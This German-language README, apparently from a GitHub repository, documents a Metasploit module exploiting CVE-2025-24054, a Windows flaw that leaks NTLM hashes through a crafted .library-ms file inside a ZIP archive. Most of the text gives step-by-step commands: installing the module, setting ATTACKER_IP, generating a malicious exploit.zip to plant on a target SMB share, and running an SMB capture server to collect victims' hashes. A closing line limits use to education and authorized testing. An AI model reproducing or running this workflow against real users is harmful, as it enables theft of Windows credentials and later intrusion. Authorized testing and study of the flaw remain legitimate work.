
Metasploit-Modul zur Ausnutzung von CVE-2025-24054 (ex 24071). In Metasploit integrierter NTLM-Leak-Exploit für Angriffsvektoren, die auf Windows-Bibliotheken basieren.
Die Verwundbarkeit tritt während des Extraktionsprozesses einer .zip-Datei auf. Bei Interaktion mit einer speziell gestalteten .library-ms-Datei verarbeitet der Windows-Explorer das interne XML-Schema und initiiert automatisch eine SMB-Authentifizierungsanfrage an einen vom Angreifer kontrollierten entfernten Pfad.
Dieses Verhalten ermöglicht die Exfiltration des NTLM-Hashs des Benutzers, ohne dass über das Entpacken der Datei hinaus eine weitere Interaktion erforderlich ist. Für einen Proof of Concept empfehle ich den Besuch des folgenden Links: Fluffy - HTB.
Obwohl diese Sicherheitslücke ursprünglich als CVE-2025-24071 verbreitet wurde, wird sie derzeit offiziell als CVE-2025-24054 verfolgt.
Repository klonen:
❯ git clone https://github.com/SecurityLayer404/CVE-2025-24054-24071---Metasploit-Module.git
❯ cd CVE-2025-24071
Das Modul in das Metasploit-Verzeichnis kopieren:
❯ cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/
Falls das Verzeichnis nicht existiert, erstellen Sie es mit:
❯ mkdir -p ~/.msf4/modules/auxiliary/server/
Anschließend das Modul erneut kopieren.
Metasploit starten und das Modul laden:
❯ msfconsole -q
❯ use auxiliary/server/ntlm_hash_leak
Wenn das Modul korrekt geladen wurde, können Sie die Optionen zur Konfiguration sehen:
❯ show options
Module options (auxiliary/server/ntlm_hash_leak):
Name Current Setting Required Description
---- --------------- -------- -----------
ATTACKER_IP yes IP del atacante (donde corre Responder/Impacket)
FILENAME exploit.zip yes El nombre del archivo ZIP
LIBRARY_NAME documents.library-ms yes Nombre del archivo .library-ms
SHARE_NAME recurso yes Nombre del recurso compartido ficticio
Modul konfigurieren und ausführen:
❯ set ATTACKER_IP 0.0.0.0 # Ersetzen Sie dies durch Ihre Angreifer-IP
❯ set FILENAME exploit.zip # Name der Payload, die Sie auf den SMB-Server hochladen (Zielrechner)
❯ set LIBRARY_NAME malicious.library-ms # Name der .library-ms-Datei
❯ set SHARE_NAME it_shared # Name der SMB-Freigabe
❯ run
Ausgabe: Das Modul erzeugt eine .zip-Datei, die auf den Ziel-SMB-Server hochgeladen werden muss, damit sie später vom Opfer ausgeführt wird.
[+] exploit.zip stored at /home/user/.msf4/local/exploit.zip
[+] Archivo guardado en: /home/user/.msf4/local/exploit.zip
[*] Auxiliary module execution completed
Verwenden Sie abschließend das SMB-Capture-Modul von Metasploit, um die NTLM-Hashes zu empfangen:
❯ use auxiliary/server/capture/smb
❯ set SRVHOST 0.0.0.0 # Ersetzen Sie dies durch Ihre Angreifer-IP
❯ run
Wenn Sie Probleme beim Starten des SMB-Servers über Metasploit haben:
Dieses Modul wurde ausschließlich zu Bildungszwecken und für autorisierte Tests entwickelt. Die unbefugte Nutzung solcher Tools kann illegal sein.
Security Layer